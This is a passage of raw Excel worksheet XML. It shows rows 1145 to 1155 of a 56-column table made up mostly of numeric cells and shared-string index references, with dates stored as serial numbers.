      <c r="A1145">
        <v>5218</v>
      </c>
      <c r="B1145" t="s">
        <v>8584</v>
      </c>
      <c r="C1145" t="s">
        <v>74</v>
      </c>
      <c r="D1145" t="s">
        <v>8603</v>
      </c>
      <c r="E1145" t="s">
        <v>49</v>
      </c>
      <c r="F1145" t="s">
        <v>5647</v>
      </c>
      <c r="G1145" s="1">
        <v>44315</v>
      </c>
      <c r="H1145">
        <v>9128</v>
      </c>
      <c r="I1145">
        <v>9128</v>
      </c>
      <c r="J1145">
        <v>3</v>
      </c>
      <c r="K1145">
        <v>0</v>
      </c>
      <c r="L1145">
        <v>0</v>
      </c>
      <c r="M1145">
        <v>0</v>
      </c>
      <c r="N1145">
        <v>0</v>
      </c>
      <c r="O1145">
        <v>0</v>
      </c>
      <c r="P1145">
        <v>0</v>
      </c>
      <c r="Q1145">
        <v>0</v>
      </c>
      <c r="R1145">
        <v>2</v>
      </c>
      <c r="S1145">
        <v>2</v>
      </c>
      <c r="T1145">
        <v>2</v>
      </c>
      <c r="U1145">
        <v>12000</v>
      </c>
      <c r="V1145">
        <v>0</v>
      </c>
      <c r="W1145">
        <v>0</v>
      </c>
      <c r="X1145">
        <v>0</v>
      </c>
      <c r="Y1145">
        <v>0</v>
      </c>
      <c r="Z1145">
        <v>0</v>
      </c>
      <c r="AA1145">
        <v>0</v>
      </c>
      <c r="AB1145">
        <v>0</v>
      </c>
      <c r="AC1145">
        <v>50</v>
      </c>
      <c r="AD1145">
        <v>300</v>
      </c>
      <c r="AE1145">
        <v>300</v>
      </c>
      <c r="AF1145" t="s">
        <v>8586</v>
      </c>
      <c r="AG1145">
        <v>50141</v>
      </c>
      <c r="AH1145">
        <v>14</v>
      </c>
      <c r="AJ1145">
        <v>220</v>
      </c>
      <c r="AK1145" t="s">
        <v>3842</v>
      </c>
      <c r="AL1145" t="s">
        <v>3842</v>
      </c>
      <c r="AM1145" t="s">
        <v>8604</v>
      </c>
      <c r="AN1145" t="s">
        <v>82</v>
      </c>
      <c r="AO1145">
        <v>1981</v>
      </c>
      <c r="AP1145" t="s">
        <v>8589</v>
      </c>
      <c r="AQ1145" t="s">
        <v>8605</v>
      </c>
      <c r="AR1145" t="s">
        <v>8586</v>
      </c>
      <c r="AS1145" t="s">
        <v>71</v>
      </c>
      <c r="AT1145" t="s">
        <v>86</v>
      </c>
      <c r="AU1145">
        <v>6</v>
      </c>
      <c r="AV1145">
        <v>1</v>
      </c>
      <c r="AW1145">
        <v>0</v>
      </c>
      <c r="AX1145">
        <v>0</v>
      </c>
      <c r="AY1145">
        <v>18</v>
      </c>
      <c r="AZ1145">
        <v>18</v>
      </c>
      <c r="BA1145" t="s">
        <v>16848</v>
      </c>
      <c r="BB1145" t="s">
        <v>16111</v>
      </c>
      <c r="BC1145" t="s">
        <v>9477</v>
      </c>
      <c r="BD1145">
        <v>0</v>
      </c>
    </row>
    <row r="1146" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1146">
        <v>5299</v>
      </c>
      <c r="B1146" t="s">
        <v>8606</v>
      </c>
      <c r="C1146" t="s">
        <v>4653</v>
      </c>
      <c r="D1146" t="s">
        <v>8607</v>
      </c>
      <c r="E1146" t="s">
        <v>49</v>
      </c>
      <c r="F1146" t="s">
        <v>1276</v>
      </c>
      <c r="G1146" s="1">
        <v>44315</v>
      </c>
      <c r="H1146">
        <v>9140</v>
      </c>
      <c r="I1146">
        <v>9140</v>
      </c>
      <c r="J1146">
        <v>0</v>
      </c>
      <c r="K1146">
        <v>0</v>
      </c>
      <c r="L1146">
        <v>0</v>
      </c>
      <c r="M1146">
        <v>0</v>
      </c>
      <c r="N1146">
        <v>0</v>
      </c>
      <c r="O1146">
        <v>0</v>
      </c>
      <c r="P1146">
        <v>0</v>
      </c>
      <c r="Q1146">
        <v>1</v>
      </c>
      <c r="R1146">
        <v>3</v>
      </c>
      <c r="S1146">
        <v>0</v>
      </c>
      <c r="T1146">
        <v>1</v>
      </c>
      <c r="U1146">
        <v>0</v>
      </c>
      <c r="V1146">
        <v>0</v>
      </c>
      <c r="W1146">
        <v>0</v>
      </c>
      <c r="X1146">
        <v>0</v>
      </c>
      <c r="Y1146">
        <v>0</v>
      </c>
      <c r="Z1146">
        <v>0</v>
      </c>
      <c r="AA1146">
        <v>0</v>
      </c>
      <c r="AB1146">
        <v>50</v>
      </c>
      <c r="AC1146">
        <v>200</v>
      </c>
      <c r="AD1146">
        <v>0</v>
      </c>
      <c r="AE1146">
        <v>700</v>
      </c>
      <c r="AF1146" t="s">
        <v>8608</v>
      </c>
      <c r="AG1146">
        <v>36124</v>
      </c>
      <c r="AH1146">
        <v>7</v>
      </c>
      <c r="AJ1146">
        <v>97</v>
      </c>
      <c r="AK1146" t="s">
        <v>6602</v>
      </c>
      <c r="AL1146" t="s">
        <v>8609</v>
      </c>
      <c r="AM1146" t="s">
        <v>8610</v>
      </c>
      <c r="AN1146" t="s">
        <v>68</v>
      </c>
      <c r="AO1146">
        <v>2016</v>
      </c>
      <c r="AP1146">
        <v>81274418734</v>
      </c>
      <c r="AQ1146" t="s">
        <v>8611</v>
      </c>
      <c r="AR1146" t="s">
        <v>8608</v>
      </c>
      <c r="AS1146" t="s">
        <v>71</v>
      </c>
      <c r="AT1146" t="s">
        <v>72</v>
      </c>
      <c r="AU1146">
        <v>26</v>
      </c>
      <c r="AV1146">
        <v>1</v>
      </c>
      <c r="AW1146">
        <v>0</v>
      </c>
      <c r="AX1146">
        <v>1</v>
      </c>
      <c r="AY1146">
        <v>2</v>
      </c>
      <c r="AZ1146">
        <v>11</v>
      </c>
      <c r="BA1146" t="s">
        <v>17657</v>
      </c>
      <c r="BB1146" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1146" t="s">
        <v>13205</v>
      </c>
      <c r="BD1146">
        <v>0</v>
      </c>
    </row>
    <row r="1147" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1147">
        <v>5310</v>
      </c>
      <c r="B1147" t="s">
        <v>8612</v>
      </c>
      <c r="C1147" t="s">
        <v>60</v>
      </c>
      <c r="D1147" t="s">
        <v>8613</v>
      </c>
      <c r="E1147" t="s">
        <v>8614</v>
      </c>
      <c r="F1147" t="s">
        <v>8615</v>
      </c>
      <c r="G1147" s="1">
        <v>44263</v>
      </c>
      <c r="H1147">
        <v>9192</v>
      </c>
      <c r="I1147">
        <v>9192</v>
      </c>
      <c r="J1147">
        <v>0</v>
      </c>
      <c r="K1147">
        <v>0</v>
      </c>
      <c r="L1147">
        <v>0</v>
      </c>
      <c r="M1147">
        <v>0</v>
      </c>
      <c r="N1147">
        <v>0</v>
      </c>
      <c r="O1147">
        <v>0</v>
      </c>
      <c r="P1147">
        <v>0</v>
      </c>
      <c r="Q1147">
        <v>2</v>
      </c>
      <c r="R1147">
        <v>1</v>
      </c>
      <c r="S1147">
        <v>0</v>
      </c>
      <c r="T1147">
        <v>1</v>
      </c>
      <c r="U1147">
        <v>0</v>
      </c>
      <c r="V1147">
        <v>0</v>
      </c>
      <c r="W1147">
        <v>0</v>
      </c>
      <c r="X1147">
        <v>0</v>
      </c>
      <c r="Y1147">
        <v>0</v>
      </c>
      <c r="Z1147">
        <v>0</v>
      </c>
      <c r="AA1147">
        <v>0</v>
      </c>
      <c r="AB1147">
        <v>50</v>
      </c>
      <c r="AC1147">
        <v>200</v>
      </c>
      <c r="AD1147">
        <v>0</v>
      </c>
      <c r="AE1147">
        <v>500</v>
      </c>
      <c r="AF1147" t="s">
        <v>8616</v>
      </c>
      <c r="AG1147">
        <v>35141</v>
      </c>
      <c r="AH1147">
        <v>10</v>
      </c>
      <c r="AJ1147">
        <v>139</v>
      </c>
      <c r="AK1147" t="s">
        <v>8617</v>
      </c>
      <c r="AL1147" t="s">
        <v>8618</v>
      </c>
      <c r="AM1147" t="s">
        <v>8619</v>
      </c>
      <c r="AN1147" t="s">
        <v>68</v>
      </c>
      <c r="AO1147">
        <v>2018</v>
      </c>
      <c r="AP1147">
        <v>895636547230</v>
      </c>
      <c r="AQ1147" t="s">
        <v>8620</v>
      </c>
      <c r="AR1147" t="s">
        <v>8616</v>
      </c>
      <c r="AS1147" t="s">
        <v>71</v>
      </c>
      <c r="AT1147" t="s">
        <v>72</v>
      </c>
      <c r="AU1147">
        <v>0</v>
      </c>
      <c r="AV1147">
        <v>0</v>
      </c>
      <c r="AW1147">
        <v>0</v>
      </c>
      <c r="AX1147">
        <v>0</v>
      </c>
      <c r="AY1147">
        <v>3</v>
      </c>
      <c r="AZ1147">
        <v>3</v>
      </c>
      <c r="BA1147" t="s">
        <v>17665</v>
      </c>
      <c r="BB1147">
        <v>0</v>
      </c>
      <c r="BC1147" t="s">
        <v>13207</v>
      </c>
      <c r="BD1147">
        <v>0</v>
      </c>
    </row>
    <row r="1148" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1148">
        <v>5326</v>
      </c>
      <c r="B1148" t="s">
        <v>8621</v>
      </c>
      <c r="C1148" t="s">
        <v>189</v>
      </c>
      <c r="D1148" t="s">
        <v>8622</v>
      </c>
      <c r="E1148" t="s">
        <v>142</v>
      </c>
      <c r="F1148" t="s">
        <v>8623</v>
      </c>
      <c r="G1148" s="1">
        <v>44281</v>
      </c>
      <c r="H1148">
        <v>9213</v>
      </c>
      <c r="I1148">
        <v>9213</v>
      </c>
      <c r="J1148">
        <v>1</v>
      </c>
      <c r="K1148">
        <v>0</v>
      </c>
      <c r="L1148">
        <v>2</v>
      </c>
      <c r="M1148">
        <v>0</v>
      </c>
      <c r="N1148">
        <v>0</v>
      </c>
      <c r="O1148">
        <v>0</v>
      </c>
      <c r="P1148">
        <v>0</v>
      </c>
      <c r="Q1148">
        <v>0</v>
      </c>
      <c r="R1148">
        <v>6</v>
      </c>
      <c r="S1148">
        <v>0</v>
      </c>
      <c r="T1148">
        <v>0</v>
      </c>
      <c r="U1148">
        <v>100000</v>
      </c>
      <c r="V1148">
        <v>0</v>
      </c>
      <c r="W1148">
        <v>4000</v>
      </c>
      <c r="X1148">
        <v>0</v>
      </c>
      <c r="Y1148">
        <v>0</v>
      </c>
      <c r="Z1148">
        <v>0</v>
      </c>
      <c r="AA1148">
        <v>0</v>
      </c>
      <c r="AB1148">
        <v>0</v>
      </c>
      <c r="AC1148">
        <v>1000</v>
      </c>
      <c r="AD1148">
        <v>0</v>
      </c>
      <c r="AE1148">
        <v>0</v>
      </c>
      <c r="AF1148" t="s">
        <v>8624</v>
      </c>
      <c r="AG1148">
        <v>97128</v>
      </c>
      <c r="AH1148">
        <v>31</v>
      </c>
      <c r="AJ1148">
        <v>461</v>
      </c>
      <c r="AK1148" t="s">
        <v>1566</v>
      </c>
      <c r="AL1148" t="s">
        <v>1567</v>
      </c>
      <c r="AM1148" t="s">
        <v>8625</v>
      </c>
      <c r="AN1148" t="s">
        <v>55</v>
      </c>
      <c r="AO1148">
        <v>2016</v>
      </c>
      <c r="AP1148">
        <v>81312345544</v>
      </c>
      <c r="AQ1148" t="s">
        <v>8626</v>
      </c>
      <c r="AR1148" t="s">
        <v>8624</v>
      </c>
      <c r="AS1148" t="s">
        <v>71</v>
      </c>
      <c r="AT1148" t="s">
        <v>58</v>
      </c>
      <c r="AU1148">
        <v>0</v>
      </c>
      <c r="AV1148">
        <v>0</v>
      </c>
      <c r="AW1148">
        <v>11</v>
      </c>
      <c r="AX1148">
        <v>4</v>
      </c>
      <c r="AY1148">
        <v>2</v>
      </c>
      <c r="AZ1148">
        <v>2</v>
      </c>
      <c r="BA1148" t="s">
        <v>17669</v>
      </c>
      <c r="BB1148" t="s">
        <v>16137</v>
      </c>
      <c r="BC1148" t="s">
        <v>13222</v>
      </c>
      <c r="BD1148">
        <v>0</v>
      </c>
    </row>
    <row r="1149" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1149">
        <v>5278</v>
      </c>
      <c r="B1149" t="s">
        <v>8627</v>
      </c>
      <c r="C1149" t="s">
        <v>872</v>
      </c>
      <c r="D1149" t="s">
        <v>8628</v>
      </c>
      <c r="E1149" t="s">
        <v>49</v>
      </c>
      <c r="F1149" t="s">
        <v>3341</v>
      </c>
      <c r="G1149" s="1">
        <v>44340</v>
      </c>
      <c r="H1149">
        <v>9223</v>
      </c>
      <c r="I1149">
        <v>9223</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10</v>
      </c>
      <c r="AE1149">
        <v>0</v>
      </c>
      <c r="AF1149" t="s">
        <v>8629</v>
      </c>
      <c r="AG1149">
        <v>94238</v>
      </c>
      <c r="AH1149">
        <v>28</v>
      </c>
      <c r="AJ1149">
        <v>398</v>
      </c>
      <c r="AK1149" t="s">
        <v>8630</v>
      </c>
      <c r="AL1149" t="s">
        <v>8631</v>
      </c>
      <c r="AM1149" t="s">
        <v>8632</v>
      </c>
      <c r="AN1149" t="s">
        <v>68</v>
      </c>
      <c r="AO1149">
        <v>2019</v>
      </c>
      <c r="AP1149">
        <v>85256337906</v>
      </c>
      <c r="AQ1149" t="s">
        <v>8633</v>
      </c>
      <c r="AR1149" t="s">
        <v>8629</v>
      </c>
      <c r="AS1149" t="s">
        <v>71</v>
      </c>
      <c r="AT1149" t="s">
        <v>72</v>
      </c>
      <c r="AU1149">
        <v>24</v>
      </c>
      <c r="AV1149">
        <v>1</v>
      </c>
      <c r="AW1149">
        <v>0</v>
      </c>
      <c r="AX1149">
        <v>0</v>
      </c>
      <c r="AY1149">
        <v>2</v>
      </c>
      <c r="AZ1149">
        <v>7</v>
      </c>
      <c r="BA1149" t="s">
        <v>17649</v>
      </c>
      <c r="BB1149">
        <v>0</v>
      </c>
      <c r="BC1149" t="s">
        <v>13574</v>
      </c>
      <c r="BD1149">
        <v>0</v>
      </c>
    </row>
    <row r="1150" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1150">
        <v>5435</v>
      </c>
      <c r="B1150" t="s">
        <v>8634</v>
      </c>
      <c r="C1150" t="s">
        <v>318</v>
      </c>
      <c r="D1150" t="s">
        <v>8635</v>
      </c>
      <c r="E1150" t="s">
        <v>300</v>
      </c>
      <c r="F1150" t="s">
        <v>8636</v>
      </c>
      <c r="G1150" s="1">
        <v>44287</v>
      </c>
      <c r="H1150">
        <v>9295</v>
      </c>
      <c r="I1150">
        <v>9295</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t="s">
        <v>8637</v>
      </c>
      <c r="AG1150">
        <v>90262</v>
      </c>
      <c r="AH1150">
        <v>26</v>
      </c>
      <c r="AJ1150">
        <v>420</v>
      </c>
      <c r="AK1150" t="s">
        <v>331</v>
      </c>
      <c r="AL1150" t="s">
        <v>1248</v>
      </c>
      <c r="AM1150" t="s">
        <v>8638</v>
      </c>
      <c r="AN1150" t="s">
        <v>55</v>
      </c>
      <c r="AO1150">
        <v>2018</v>
      </c>
      <c r="AP1150" t="s">
        <v>8639</v>
      </c>
      <c r="AQ1150" t="s">
        <v>8640</v>
      </c>
      <c r="AR1150" t="s">
        <v>8637</v>
      </c>
      <c r="AS1150" t="s">
        <v>71</v>
      </c>
      <c r="AT1150" t="s">
        <v>58</v>
      </c>
      <c r="AU1150">
        <v>26</v>
      </c>
      <c r="AV1150">
        <v>0</v>
      </c>
      <c r="AW1150">
        <v>3</v>
      </c>
      <c r="AX1150">
        <v>0</v>
      </c>
      <c r="AY1150">
        <v>1</v>
      </c>
      <c r="AZ1150">
        <v>1</v>
      </c>
      <c r="BA1150" t="s">
        <v>17674</v>
      </c>
      <c r="BB1150" t="s">
        <v>16140</v>
      </c>
      <c r="BC1150" t="s">
        <v>9522</v>
      </c>
      <c r="BD1150" t="s">
        <v>13264</v>
      </c>
    </row>
    <row r="1151" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1151">
        <v>5427</v>
      </c>
      <c r="B1151" t="s">
        <v>8641</v>
      </c>
      <c r="C1151" t="s">
        <v>215</v>
      </c>
      <c r="D1151" t="s">
        <v>8642</v>
      </c>
      <c r="E1151" t="s">
        <v>363</v>
      </c>
      <c r="F1151" t="s">
        <v>8643</v>
      </c>
      <c r="G1151" s="1">
        <v>44274</v>
      </c>
      <c r="H1151">
        <v>9323</v>
      </c>
      <c r="I1151">
        <v>9323</v>
      </c>
      <c r="J1151">
        <v>0</v>
      </c>
      <c r="K1151">
        <v>0</v>
      </c>
      <c r="L1151">
        <v>0</v>
      </c>
      <c r="M1151">
        <v>0</v>
      </c>
      <c r="N1151">
        <v>0</v>
      </c>
      <c r="O1151">
        <v>0</v>
      </c>
      <c r="P1151">
        <v>0</v>
      </c>
      <c r="Q1151">
        <v>1</v>
      </c>
      <c r="R1151">
        <v>0</v>
      </c>
      <c r="S1151">
        <v>0</v>
      </c>
      <c r="T1151">
        <v>1</v>
      </c>
      <c r="U1151">
        <v>0</v>
      </c>
      <c r="V1151">
        <v>0</v>
      </c>
      <c r="W1151">
        <v>0</v>
      </c>
      <c r="X1151">
        <v>0</v>
      </c>
      <c r="Y1151">
        <v>0</v>
      </c>
      <c r="Z1151">
        <v>0</v>
      </c>
      <c r="AA1151">
        <v>0</v>
      </c>
      <c r="AB1151">
        <v>4</v>
      </c>
      <c r="AC1151">
        <v>0</v>
      </c>
      <c r="AD1151">
        <v>0</v>
      </c>
      <c r="AE1151">
        <v>100</v>
      </c>
      <c r="AF1151" t="s">
        <v>8644</v>
      </c>
      <c r="AG1151">
        <v>33121</v>
      </c>
      <c r="AH1151">
        <v>6</v>
      </c>
      <c r="AJ1151">
        <v>147</v>
      </c>
      <c r="AK1151" t="s">
        <v>8645</v>
      </c>
      <c r="AL1151" t="s">
        <v>8646</v>
      </c>
      <c r="AM1151" t="s">
        <v>8647</v>
      </c>
      <c r="AN1151" t="s">
        <v>68</v>
      </c>
      <c r="AO1151">
        <v>2015</v>
      </c>
      <c r="AP1151">
        <v>85267372067</v>
      </c>
      <c r="AQ1151">
        <v>85267372067</v>
      </c>
      <c r="AR1151" t="s">
        <v>8644</v>
      </c>
      <c r="AS1151" t="s">
        <v>71</v>
      </c>
      <c r="AT1151" t="s">
        <v>72</v>
      </c>
      <c r="AU1151">
        <v>25</v>
      </c>
      <c r="AV1151">
        <v>1</v>
      </c>
      <c r="AW1151">
        <v>0</v>
      </c>
      <c r="AX1151">
        <v>0</v>
      </c>
      <c r="AY1151">
        <v>1</v>
      </c>
      <c r="AZ1151">
        <v>6</v>
      </c>
      <c r="BA1151" t="s">
        <v>17672</v>
      </c>
      <c r="BB1151">
        <v>0</v>
      </c>
      <c r="BC1151" t="s">
        <v>9852</v>
      </c>
      <c r="BD1151">
        <v>0</v>
      </c>
    </row>
    <row r="1152" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1152">
        <v>5426</v>
      </c>
      <c r="B1152" t="s">
        <v>8648</v>
      </c>
      <c r="C1152" t="s">
        <v>157</v>
      </c>
      <c r="D1152" t="s">
        <v>8649</v>
      </c>
      <c r="E1152" t="s">
        <v>49</v>
      </c>
      <c r="F1152" t="s">
        <v>3341</v>
      </c>
      <c r="G1152" s="1">
        <v>44316</v>
      </c>
      <c r="H1152">
        <v>9346</v>
      </c>
      <c r="I1152">
        <v>9346</v>
      </c>
      <c r="J1152">
        <v>0</v>
      </c>
      <c r="K1152">
        <v>0</v>
      </c>
      <c r="L1152">
        <v>0</v>
      </c>
      <c r="M1152">
        <v>0</v>
      </c>
      <c r="N1152">
        <v>0</v>
      </c>
      <c r="O1152">
        <v>4</v>
      </c>
      <c r="P1152">
        <v>0</v>
      </c>
      <c r="Q1152">
        <v>1</v>
      </c>
      <c r="R1152">
        <v>0</v>
      </c>
      <c r="S1152">
        <v>0</v>
      </c>
      <c r="T1152">
        <v>1</v>
      </c>
      <c r="U1152">
        <v>0</v>
      </c>
      <c r="V1152">
        <v>0</v>
      </c>
      <c r="W1152">
        <v>0</v>
      </c>
      <c r="X1152">
        <v>0</v>
      </c>
      <c r="Y1152">
        <v>0</v>
      </c>
      <c r="Z1152">
        <v>200</v>
      </c>
      <c r="AA1152">
        <v>0</v>
      </c>
      <c r="AB1152">
        <v>20</v>
      </c>
      <c r="AC1152">
        <v>0</v>
      </c>
      <c r="AD1152">
        <v>0</v>
      </c>
      <c r="AE1152">
        <v>300</v>
      </c>
      <c r="AF1152" t="s">
        <v>8650</v>
      </c>
      <c r="AG1152">
        <v>67155</v>
      </c>
      <c r="AH1152">
        <v>16</v>
      </c>
      <c r="AJ1152">
        <v>241</v>
      </c>
      <c r="AK1152" t="s">
        <v>1231</v>
      </c>
      <c r="AL1152" t="s">
        <v>8143</v>
      </c>
      <c r="AM1152" t="s">
        <v>8651</v>
      </c>
      <c r="AN1152" t="s">
        <v>68</v>
      </c>
      <c r="AO1152">
        <v>2005</v>
      </c>
      <c r="AP1152">
        <v>82231074108</v>
      </c>
      <c r="AQ1152" t="s">
        <v>8652</v>
      </c>
      <c r="AR1152" t="s">
        <v>8650</v>
      </c>
      <c r="AS1152" t="s">
        <v>71</v>
      </c>
      <c r="AT1152" t="s">
        <v>72</v>
      </c>
      <c r="AU1152">
        <v>25</v>
      </c>
      <c r="AV1152">
        <v>1</v>
      </c>
      <c r="AW1152">
        <v>1</v>
      </c>
      <c r="AX1152">
        <v>2</v>
      </c>
      <c r="AY1152">
        <v>0</v>
      </c>
      <c r="AZ1152">
        <v>3</v>
      </c>
      <c r="BA1152" t="s">
        <v>17671</v>
      </c>
      <c r="BB1152">
        <v>0</v>
      </c>
      <c r="BC1152" t="s">
        <v>13284</v>
      </c>
      <c r="BD1152">
        <v>0</v>
      </c>
    </row>
    <row r="1153" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1153">
        <v>5444</v>
      </c>
      <c r="B1153" t="s">
        <v>8653</v>
      </c>
      <c r="C1153" t="s">
        <v>88</v>
      </c>
      <c r="D1153" t="s">
        <v>8654</v>
      </c>
      <c r="E1153" t="s">
        <v>142</v>
      </c>
      <c r="F1153" t="s">
        <v>8655</v>
      </c>
      <c r="G1153" s="1">
        <v>44319</v>
      </c>
      <c r="H1153">
        <v>9353</v>
      </c>
      <c r="I1153">
        <v>9353</v>
      </c>
      <c r="J1153">
        <v>2</v>
      </c>
      <c r="K1153">
        <v>0</v>
      </c>
      <c r="L1153">
        <v>0</v>
      </c>
      <c r="M1153">
        <v>0</v>
      </c>
      <c r="N1153">
        <v>0</v>
      </c>
      <c r="O1153">
        <v>0</v>
      </c>
      <c r="P1153">
        <v>0</v>
      </c>
      <c r="Q1153">
        <v>1</v>
      </c>
      <c r="R1153">
        <v>0</v>
      </c>
      <c r="S1153">
        <v>0</v>
      </c>
      <c r="T1153">
        <v>0</v>
      </c>
      <c r="U1153">
        <v>250</v>
      </c>
      <c r="V1153">
        <v>0</v>
      </c>
      <c r="W1153">
        <v>0</v>
      </c>
      <c r="X1153">
        <v>0</v>
      </c>
      <c r="Y1153">
        <v>0</v>
      </c>
      <c r="Z1153">
        <v>0</v>
      </c>
      <c r="AA1153">
        <v>0</v>
      </c>
      <c r="AB1153">
        <v>0</v>
      </c>
      <c r="AC1153">
        <v>0</v>
      </c>
      <c r="AD1153">
        <v>0</v>
      </c>
      <c r="AE1153">
        <v>0</v>
      </c>
      <c r="AF1153" t="s">
        <v>8656</v>
      </c>
      <c r="AG1153">
        <v>80221</v>
      </c>
      <c r="AH1153">
        <v>17</v>
      </c>
      <c r="AJ1153">
        <v>282</v>
      </c>
      <c r="AK1153" t="s">
        <v>592</v>
      </c>
      <c r="AL1153" t="s">
        <v>593</v>
      </c>
      <c r="AM1153" t="s">
        <v>8657</v>
      </c>
      <c r="AN1153" t="s">
        <v>55</v>
      </c>
      <c r="AO1153">
        <v>2015</v>
      </c>
      <c r="AP1153">
        <v>81238463896</v>
      </c>
      <c r="AQ1153">
        <v>81339505088</v>
      </c>
      <c r="AR1153" t="s">
        <v>8656</v>
      </c>
      <c r="AS1153" t="s">
        <v>71</v>
      </c>
      <c r="AT1153" t="s">
        <v>58</v>
      </c>
      <c r="AU1153">
        <v>28</v>
      </c>
      <c r="AV1153">
        <v>0</v>
      </c>
      <c r="AW1153">
        <v>0</v>
      </c>
      <c r="AX1153">
        <v>0</v>
      </c>
      <c r="AY1153">
        <v>11</v>
      </c>
      <c r="AZ1153">
        <v>11</v>
      </c>
      <c r="BA1153" t="s">
        <v>17677</v>
      </c>
      <c r="BB1153">
        <v>0</v>
      </c>
      <c r="BC1153" t="s">
        <v>13651</v>
      </c>
      <c r="BD1153" t="s">
        <v>13652</v>
      </c>
    </row>
    <row r="1154" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1154">
        <v>5439</v>
      </c>
      <c r="B1154" t="s">
        <v>109</v>
      </c>
      <c r="C1154" t="s">
        <v>99</v>
      </c>
      <c r="D1154" t="s">
        <v>8658</v>
      </c>
      <c r="E1154" t="s">
        <v>142</v>
      </c>
      <c r="F1154" t="s">
        <v>8659</v>
      </c>
      <c r="G1154" s="1">
        <v>44306</v>
      </c>
      <c r="H1154">
        <v>9356</v>
      </c>
      <c r="I1154">
        <v>9356</v>
      </c>
      <c r="J1154">
        <v>1</v>
      </c>
      <c r="K1154">
        <v>0</v>
      </c>
      <c r="L1154">
        <v>0</v>
      </c>
      <c r="M1154">
        <v>1</v>
      </c>
      <c r="N1154">
        <v>0</v>
      </c>
      <c r="O1154">
        <v>0</v>
      </c>
      <c r="P1154">
        <v>0</v>
      </c>
      <c r="Q1154">
        <v>8</v>
      </c>
      <c r="R1154">
        <v>0</v>
      </c>
      <c r="S1154">
        <v>1</v>
      </c>
      <c r="T1154">
        <v>0</v>
      </c>
      <c r="U1154">
        <v>500</v>
      </c>
      <c r="V1154">
        <v>0</v>
      </c>
      <c r="W1154">
        <v>0</v>
      </c>
      <c r="X1154">
        <v>1000</v>
      </c>
      <c r="Y1154">
        <v>0</v>
      </c>
      <c r="Z1154">
        <v>0</v>
      </c>
      <c r="AA1154">
        <v>0</v>
      </c>
      <c r="AB1154">
        <v>50</v>
      </c>
      <c r="AC1154">
        <v>0</v>
      </c>
      <c r="AD1154">
        <v>1</v>
      </c>
      <c r="AE1154">
        <v>0</v>
      </c>
      <c r="AF1154" t="s">
        <v>113</v>
      </c>
      <c r="AG1154">
        <v>14450</v>
      </c>
      <c r="AH1154">
        <v>12</v>
      </c>
      <c r="AJ1154">
        <v>160</v>
      </c>
      <c r="AK1154" t="s">
        <v>114</v>
      </c>
      <c r="AL1154" t="s">
        <v>114</v>
      </c>
      <c r="AM1154" t="s">
        <v>8660</v>
      </c>
      <c r="AN1154" t="s">
        <v>55</v>
      </c>
      <c r="AO1154">
        <v>2009</v>
      </c>
      <c r="AP1154" t="s">
        <v>8661</v>
      </c>
      <c r="AQ1154" t="s">
        <v>8662</v>
      </c>
      <c r="AR1154" t="s">
        <v>118</v>
      </c>
      <c r="AS1154" t="s">
        <v>71</v>
      </c>
      <c r="AT1154" t="s">
        <v>58</v>
      </c>
      <c r="AU1154">
        <v>26</v>
      </c>
      <c r="AV1154">
        <v>0</v>
      </c>
      <c r="AW1154">
        <v>50</v>
      </c>
      <c r="AX1154">
        <v>8</v>
      </c>
      <c r="AY1154">
        <v>25</v>
      </c>
      <c r="AZ1154">
        <v>4</v>
      </c>
      <c r="BA1154" t="s">
        <v>16622</v>
      </c>
      <c r="BB1154">
        <v>0</v>
      </c>
      <c r="BC1154" t="s">
        <v>9525</v>
      </c>
      <c r="BD1154" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="1155" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1155">
        <v>5232</v>
      </c>
      <c r="B1155" t="s">
        <v>8663</v>
      </c>
      <c r="C1155" t="s">
        <v>4653</v>
      </c>
      <c r="D1155" t="s">
        <v>8664</v>
      </c>
      <c r="E1155" t="s">
        <v>363</v>
      </c>
      <c r="F1155" t="s">
        <v>8665</v>
      </c>
      <c r="G1155" s="1">
        <v>44309</v>
      </c>
      <c r="H1155">
        <v>9378</v>
      </c>
      <c r="I1155">
        <v>9378</v>
      </c>
      <c r="J1155">
        <v>0</v>
      </c>
      <c r="K1155">
        <v>0</v>
      </c>
      <c r="L1155">
        <v>0</v>
      </c>
      <c r="M1155">
        <v>0</v>
      </c>
      <c r="N1155">
        <v>0</v>
      </c>
      <c r="O1155">
        <v>0</v>
      </c>
      <c r="P1155">
        <v>0</v>
      </c>
      <c r="Q1155">
        <v>2</v>
      </c>
      <c r="R1155">
        <v>2</v>
      </c>
      <c r="S1155">
        <v>0</v>
      </c>
      <c r="T1155">
        <v>0</v>
      </c>
      <c r="U1155">
        <v>0</v>
      </c>
      <c r="V1155">
        <v>0</v>
      </c>
      <c r="W1155">
        <v>0</v>
      </c>
      <c r="X1155">
        <v>0</v>
      </c>
      <c r="Y1155">
        <v>0</v>
      </c>
      <c r="Z1155">
        <v>0</v>
      </c>
      <c r="AA1155">
        <v>0</v>
      </c>
      <c r="AB1155">
        <v>20</v>
      </c>
      <c r="AC1155">
        <v>30</v>
      </c>
      <c r="AD1155">
        <v>0</v>
      </c>
      <c r="AE1155">
        <v>0</v>
      </c>
      <c r="AF1155" t="s">
        <v>8666</v>
      </c>
      <c r="AG1155">
        <v>36611</v>
      </c>
      <c r="AH1155">
        <v>7</v>
      </c>
      <c r="AJ1155">
        <v>91</v>
      </c>
      <c r="AK1155" t="s">
        <v>8667</v>
      </c>
      <c r="AL1155" t="s">
        <v>8668</v>
      </c>
      <c r="AM1155" t="s">
        <v>8669</v>
      </c>
      <c r="AN1155" t="s">
        <v>68</v>
      </c>
      <c r="AO1155">
        <v>2010</v>
      </c>
      <c r="AP1155" t="s">
        <v>623</v>
      </c>
      <c r="AQ1155" t="s">
        <v>8670</v>
      </c>
      <c r="AR1155" t="s">
        <v>8666</v>
      </c>
      <c r="AS1155" t="s">
        <v>71</v>
      </c>
      <c r="AT1155" t="s">
        <v>72</v>
      </c>
      <c r="AU1155">
        <v>30</v>
      </c>
      <c r="AV1155">
        <v>0</v>
